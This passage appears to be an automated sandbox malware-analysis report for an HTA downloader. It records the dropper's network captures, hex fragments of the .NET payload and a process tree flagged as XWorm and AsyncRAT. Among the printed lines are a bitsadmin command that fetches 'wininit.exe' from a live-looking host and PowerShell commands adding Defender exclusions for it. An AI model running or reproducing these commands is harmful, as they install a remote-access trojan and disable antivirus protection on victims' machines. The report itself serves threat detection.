                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTz0Xr8IEzqkP0mxAh6Ry%2FLuUJ9cuTMAOIZai1DdNbmP6WUd8%2BJ%2F2ubMFMOvcwfXHVGuKHhDRs%2BISdelXxxW7jVCpg4XtmGNZx35RSMSgYOgQxJCpFeObE%2FbYBQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd068c8a08c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5546&min_rtt=2030&rtt_var=4888&sent=16&recv=21&lost=0&retrans=0&sent_bytes=14487&recv_bytes=2102&delivery_rate=1438423&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 0b 07 6f 85 00 00 0a 0d 12 03 72 2c 0c 00 70 28 86 00 00 0a 0a de 1d de 1b 25 28 2f 00 00 0a 0c 72 40 0c 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 01 10 00 00 00 00 00 00 23 23 00 1b 33 00 00 01 1b 30 03 00 49 00 00 00 15 00 00 11 7e 2f 00 00 04 28 59 00 00 0a 7e 0d 00 00 04 16 28 65 00 00 0a 16 33 0a 72 16 0c 00 70 0a de 27 2b 08 72 fe 0b 00 70 0a de 1d de 1b 25 28 2f 00 00 0a 0b 72 40 0c 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 2c 2c 00 1b 33 00 00 01 1b 30 02 00 3e 00 00 00 16 00 00 11 28 87 00 00 0a 73 88 00 00 0a 20 20 02 00 00 6f 89 00 00 0a 0c 12 02 28 83 00 00 0a 0a de 1d de 1b 25 28 2f 00 00 0a 0b 72 40 0c 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 21 21 00 1b 33 00 00 01 1b 30 04
                                                                Data Ascii: or,p(%(/r@p(1(1*##30I~/(Y~(e3rp'+rp%(/r@p(1(1*,,30>(s o(%(/r@p(1(1*!!30
                                                                Dec 4, 2024 16:26:19.174371958 CET1236INData Raw: 00 cf 00 00 00 17 00 00 11 72 4c 0c 00 70 28 8a 00 00 0a 72 52 0c 00 70 28 32 00 00 0a 72 7e 0c 00 70 73 8b 00 00 0a 0b 73 8c 00 00 0a 0c 07 6f 8d 00 00 0a 6f 8e 00 00 0a 13 05 2b 2b 11 05 6f 8f 00 00 0a 0d 08 09 72 bc 0c 00 70 6f 90 00 00 0a 6f
                                                                Data Ascii: rLp(rRp(2r~pssoo++orpoo&o&rpo&o-,ohoo3rpAooo*,oh%(/rp(1(1*(%Ej
                                                                Dec 4, 2024 16:26:19.178293943 CET53INData Raw: 73 79 00 00 0a 7e 13 00 00 04 6f 7a 00 00 0a 26 de 1b 25 28 2f 00 00 0a 0c 16 80 12 00 00 04 28 31 00 00 0a de 07 28 31 00 00 0a de 00 2a 00 00 00 41 1c 00 00
                                                                Data Ascii: sy~oz&%(/(1(1*A
                                                                Dec 4, 2024 16:26:20.175906897 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=7428-9501
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:20.500931025 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:20 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 2074
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 24
                                                                Content-Range: bytes 7428-9501/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Frs5WVvj9HgIcFmm8O7rYWtVI3Ejtazd%2BY5c2537NPBLLTFDBghLupR6p%2FYzVofOiUsrFzqDkIN1g7G%2BUOF1HSmJY9lXpPA0cS%2FSxAzsmaiDeX8oIWGcupGT94%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd0711b9b8c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5108&min_rtt=2030&rtt_var=4541&sent=18&recv=23&lost=0&retrans=0&sent_bytes=17012&recv_bytes=2320&delivery_rate=1438423&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 00 00 00 00 0c 00 00 00 9d 01 00 00 a9 01 00 00 1b 00 00 00 33 00 00 01 1b 30 02 00 17 00 00 00 1c 00 00 11 02 28 8f 00 00 06 de 0e 25 28 2f 00 00 0a 0a 28 31 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 08 08 00 0e 33 00 00 01 1b 30 07 00 c9 00 00 00 1d 00 00 11 7e 19 00 00 04 13 04 11 04 28 ac 00 00 0a 16 13 05 11 04 12 05 28 ad 00 00 0a 7e 12 00 00 04 39 96 00 00 00 73 74 00 00 0a 0a 02 28 2a 01 00 06 28 32 01 00 06 0b 07 8e b7 28 ae 00 00 0a 72 b2 0d 00 70 28 2b 00 00 0a 28 2a 01 00 06 0c 06 08 16 08 8e b7 6f a8 00 00 0a 06 07 16 07 8e b7 6f a8 00 00 0a 7e 13 00 00 04 15 17 6f af 00 00 0a 26 7e 13 00 00 04 06 6f a4 00 00 0a 16 06 6f a9 00 00 0a b7 16 14 fe 06 5e 00 00 06 73 79 00 00 0a 14 6f b0 00 00 0a 26 de 0a 06 2c 06 06 6f 68 00 00 0a dc de 14 25 28 2f 00 00 0a 0d 16 80 12 00 00 04 28 31
                                                                Data Ascii: 30(%(/(1*30~((~9st(*(2(rp(+(*oo~o&~oo^syo&,oh%(/(1
                                                                Dec 4, 2024 16:26:20.501203060 CET1236INData Raw: 00 00 0a de 00 de 0c 11 05 2c 07 11 04 28 b1 00 00 0a dc 2a 00 00 00 01 28 00 00 02 00 2a 00 70 9a 00 0a 00 00 00 00 00 00 24 00 82 a6 00 14 33 00 00 01 02 00 11 00 ab bc 00 0c 00 00 00 00 1b 30 02 00 23 00 00 00 1c 00 00 11 7e 13 00 00 04 02 6f
                                                                Data Ascii: ,(*(*p$30#~o&%(/(1*30~, ~o%(/(1~, ~o%(/(1~,*~o~o
                                                                Dec 4, 2024 16:26:20.505012989 CET569INData Raw: 00 70 16 28 65 00 00 0a 16 33 42 7e 1f 00 00 04 6f c4 00 00 0a de 0e 25 28 2f 00 00 0a 0d 28 31 00 00 0a de 00 14 fe 06 9b 00 00 06 73 aa 00 00 0a 73 ab 00 00 0a 80 1f 00 00 04 7e 1f 00 00 04 06 17 9a 6f c5 00 00 0a 38 d8 04 00 00 11 13 72 30 13
                                                                Data Ascii: p(e3B~o%(/(1ss~o8r0p(e3 ~o%(/(18rBp(e3C~ o%(/(1ss ~ o8UrZp(e3 ~ o%(/
                                                                Dec 4, 2024 16:26:21.394757032 CET219OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=9502-14292
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:21.733676910 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:21 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 4791
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 25
                                                                Content-Range: bytes 9502-14292/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2l8Ak3CRMwC3JBhbMwFj9fkvmwLbTUJm9m0zBS%2BiLHiFEl2j%2F1kQ%2Bn5WNDtf6MtsTIyiT0b%2BK4IpY9CVJL6XUxi1%2Blct0KWDEVEjHcx8Nmyr82mT1LXzu2ImY8%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd078bcc48c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4730&min_rtt=2030&rtt_var=4163&sent=21&recv=25&lost=0&retrans=0&sent_bytes=20053&recv_bytes=2539&delivery_rate=2105769&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 00 00 04 a2 11 14 1a 11 08 6f c8 00 00 0a a2 11 14 28 40 00 00 0a 28 5d 00 00 06 28 31 00 00 0a de 00 38 c5 02 00 00 11 13 72 0e 14 00 70 16 28 65 00 00 0a 16 33 0f 72 0e 14 00 70 28 5d 00 00 06 38 a6 02 00 00 11 13 72 18 14 00 70 16 28 65 00 00 0a 16 33 40 06 80 1d 00 00 04 06 17 9a 28 2f 01 00 06 2d 19 72 26 14 00 70 7e 0a 00 00 04 06 17 9a 28 32 00 00 0a 28 5d 00 00 06 2b 12 06 17 9a 28 2f 01 00 06 28 30 01 00 06 28 90 00 00 06 38 56 02 00 00 11 13 72 3c 14 00 70 16 28 65 00 00 0a 16 33 26 06 18 9a 28 bb 00 00 0a 13 09 06 17 9a 11 09 28 2e 01 00 06 26 11 09 28 30 01 00 06 28 90 00 00 06 38 20 02 00 00 11 13 72 52 14 00 70 16 28 65 00 00 0a 16 33 28 28 08 00 00 06 6f 44 00 00 0a 6f 45 00 00 0a 7e 2e 00 00 04 6f c9 00 00 0a 72 6e 14 00 70 28 91 00 00 06 38 e8 01 00 00 11 13 72 90 14 00 70 16
                                                                Data Ascii: o(@(](18rp(e3rp(]8rp(e3@(/-r&p~(2(]+(/(0(8Vr<p(e3&((.&(0(8 rRp(e3((oDoE~.ornp(8rp
                                                                Dec 4, 2024 16:26:21.733843088 CET224INData Raw: 28 65 00 00 0a 16 33 4b 1b 8d 32 00 00 01 13 14 11 14 16 72 90 14 00 70 a2 11 14 17 7e 0a 00 00 04 a2 11 14 18 28 2c 01 00 06 a2 11 14 19 7e 0a 00 00 04 a2 11 14 1a 7e 11 00 00 04 28 c6 00 00 0a a2 11 14 28 40 00 00 0a 28 5d 00 00 06 38 8d 01 00
                                                                Data Ascii: (e3K2rp~(,~~((@(]8rp(e@z~*-(&*(/(1(o(o(( s(oo(
                                                                Dec 4, 2024 16:26:23.910060883 CET220OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=14293-26900
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:24.238820076 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:24 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 12608
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 28
                                                                Content-Range: bytes 14293-26900/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrixOJ4WINLlyO0rMTRjpbzOu2B5fAq69H7w0mKpczZXwGwk5CFZVoKv%2BLLhzvMIU2jIhjj6cRzuW762FltcrapM11ChS5sCn54YQQMAY40C%2FurzpAMnbBd7YgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd0887e258c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4730&min_rtt=2030&rtt_var=4163&sent=26&recv=28&lost=0&retrans=1&sent_bytes=27191&recv_bytes=2759&delivery_rate=2105769&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 03 00 00 0f 00 00 00 33 00 00 01 1b 30 02 00 32 00 00 00 1c 00 00 11 14 fe 06 c6 00 00 06 73 50 00 00 0a 17 73 10 01 00 0a 80 24 00 00 04 7e 24 00 00 04 6f 52 00 00 0a de 0e 25 28 2f 00 00 0a 0a 28 31 00 00 0a de 00 2a 00 00 01 10 00 00 00 00 00 00 23 23 00 0e 33 00 00 01 1b 30 02 00 1b 00 00 00 1c 00 00 11 7e 24 00 00 04 6f c4 00 00 0a de 0e 25 28 2f 00 00 0a 0a 28 31 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 0c 0c 00 0e 33 00 00 01 1b 30 11 00 cd 08 00 00 2a 00 00 11 17 13 17 72 23 1b 00 70 72 44 06 00 70 28 4a 00 00 0a 28 22 00 00 0a 0b 38 30 07 00 00 28 31 00 00 0a 17 13 15 1b 13 17 28 08 00 00 06 6f 44 00 00 0a 6f 45 00 00 0a 72 3f 1b 00 70 17 6f 46 00 00 0a 0c 1c 13 17 08 72 b7 1b 00 70 6f 11 01 00 0a 17 8c 86 00 00 01 16 28 e1 00 00 0a 2c 14 1d 13 17 08 72 b7 1b 00 70 16 8c 86 00 00 01 6f 47 00
                                                                Data Ascii: 302sPs$~$oR%(/(1*##30~$o%(/(1*30*r#prDp(J("80(1(oDoEr?poFrpo(,rpoG
                                                                Dec 4, 2024 16:26:26.457900047 CET220OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=26901-53755
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:26.792186975 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:26 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 26855
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 30
                                                                Content-Range: bytes 26901-53755/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFjaTeCrgtBd%2FQBfEK8lGRi5PgZSSAF3A0%2FysZSdFDC7K0hK2agVvAFpCusF68JdnpqK71yKTyLx8er3tY9EqST3PG%2BUsoerkF6x8UPSOJ6zO1EBeYhH36%2FuYvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd098597e8c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4411&min_rtt=2030&rtt_var=3760&sent=36&recv=30&lost=0&retrans=1&sent_bytes=40763&recv_bytes=2979&delivery_rate=6703397&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 00 96 00 98 19 0e 00 6c 00 69 23 00 00 00 00 96 00 7f 26 12 00 6c 00 42 26 00 00 00 00 96 00 16 32 0e 00 6c 00 49 26 00 00 00 00 96 00 c4 6a 12 00 6c 00 50 26 00 00 00 00 96 00 27 02 0e 00 6c 00 75 20 00 00 00 00 96 00 89 2c 12 00 6c 00 57 26 00 00 00 00 96 00 66 47 0e 00 6c 00 ad 20 00 00 00 00 96 00 fb 44 12 00 6c 00 5e 26 00 00 00 00 96 00 f2 47 0e 00 6c 00 65 26 00 00 00 00 96 00 48 4b 12 00 6c 00 6c 26 00 00 00 00 96 00 86 07 0e 00 6c 00 31 22 00 00 00 00 96 00 63 12 12 00 6c 00 73 26 00 00 00 00 96 00 09 4a 0e 00 6c 00 dd 21 00 00 00 00 96 00 e3 14 12 00 6c 00 7a 26 00 00 00 00 96 00 9c 2d 0e 00 6c 00 3f 22 00 00 00 00 96 00 7e 01 12 00 6c 00 81 26 00 00 00 00 96 00 0e 33 0e 00 6c 00 88 26 00 00 00 00 96 00 b5 2d 12 00 6c 00 8f 26 00 00 00 00 96 00 4e 10 0e 00 6c 00 96 26 00 00 00 00 96
                                                                Data Ascii: li#&lB&2lI&jlP&'lu ,lW&fGl Dl^&Gle&HKll&l1"cls&Jl!lz&-l?"~l&3l&-l&Nl&
                                                                Dec 4, 2024 16:26:27.738203049 CET220OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=53756-77823
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:28.066473961 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:27 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 24068
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 31
                                                                Content-Range: bytes 53756-77823/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ajq9GQjN%2BwuEziI1tuWGN7sHIGEhZQbu6sB7V5k9cqMZTbvFrk1nH%2F9wf1HT70xMebwH%2FGN0MG%2FK83mHketA2zpDodMuqBo1rgImzgv5q3pItRummb3Mq1A%2Fq2w%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd0a05ba38c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3890&min_rtt=2030&rtt_var=3012&sent=56&recv=33&lost=0&retrans=1&sent_bytes=68586&recv_bytes=3199&delivery_rate=12835164&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 51 4b 61 64 6b 46 6b 35 4d 74 43 57 35 39 4d 39 75 70 42 37 65 7a 65 71 00 79 64 38 79 63 78 66 74 77 4f 6e 6a 64 54 6b 75 58 46 6d 63 4a 42 57 5a 38 69 78 56 59 38 44 67 69 48 63 4b 66 69 62 74 78 66 49 42 76 45 45 69 71 00 37 38 62 74 53 48 4b 68 41 72 39 75 64 72 68 4a 30 4e 67 78 75 51 70 36 64 31 37 49 64 4f 68 63 4c 48 61 73 52 37 65 6e 55 67 53 44 44 54 5a 69 47 76 6c 39 6f 4c 4b 69 43 63 69 61 39 63 66 68 42 39 5a 6e 4c 34 72 44 69 73 6f 72 41 4b 6f 6d 69 71 00 6f 43 31 4c 4a 6a 6d 69 6c 65 6f 6e 56 7a 5a 59 62 63 41 59 63 68 6a 71 00 4e 41 6c 66 41 6c 7a 45 72 67 4b 49 49 78 37 70 72 35 4a 68 4a 33 42 4a 6f 42 42 73 74 74 5a 77 34 6a 6a 7a 55 68 33 51 46 4c 74 72 6f 52 65 6d 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 39 31 6b 4b 54 61 61 6e 6d 74 70 34 36 6e 72 4d 36 33 59 76
                                                                Data Ascii: QKadkFk5MtCW59M9upB7ezeqyd8ycxftwOnjdTkuXFmcJBWZ8ixVY8DgiHcKfibtxfIBvEEiq78btSHKhAr9udrhJ0NgxuQp6d17IdOhcLHasR7enUgSDDTZiGvl9oLKiCcia9cfhB9ZnL4rDisorAKomiqoC1LJjmileonVzZYbcAYchjqNAlfAlzErgKIIx7pr5JhJ3BJoBBsttZw4jjzUh3QFLtroRemqSystem.Linq91kKTaanmtp46nrM63Yv


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549765208.95.112.1801292C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 4, 2024 16:26:33.061484098 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Dec 4, 2024 16:26:34.135049105 CET175INHTTP/1.1 200 OK
                                                                Date: Wed, 04 Dec 2024 15:26:33 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 6
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                                Data Raw: 66 61 6c 73 65 0a
                                                                Data Ascii: false


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:10:25:48
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:mshta.exe "C:\Users\user\Desktop\downloader2.hta"
                                                                Imagebase:0xd60000
                                                                File size:13'312 bytes
                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:10:25:49
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                Imagebase:0x9c0000
                                                                File size:186'880 bytes
                                                                MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:10:25:49
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:10:25:49
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                Imagebase:0x7ff7e52b0000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:5
                                                                Start time:10:26:28
                                                                Start date:04/12/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\wininit.exe"
                                                                Imagebase:0x3e0000
                                                                File size:77'824 bytes
                                                                MD5 hash:DC8534F103A3167CEC27B4B01FEA89A4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:10:26:33
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'
                                                                Imagebase:0x7ff632ac0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:10:26:33
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:10:26:51
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:10:26:51
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:10:27:01
                                                                Start date:04/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:10:27:01
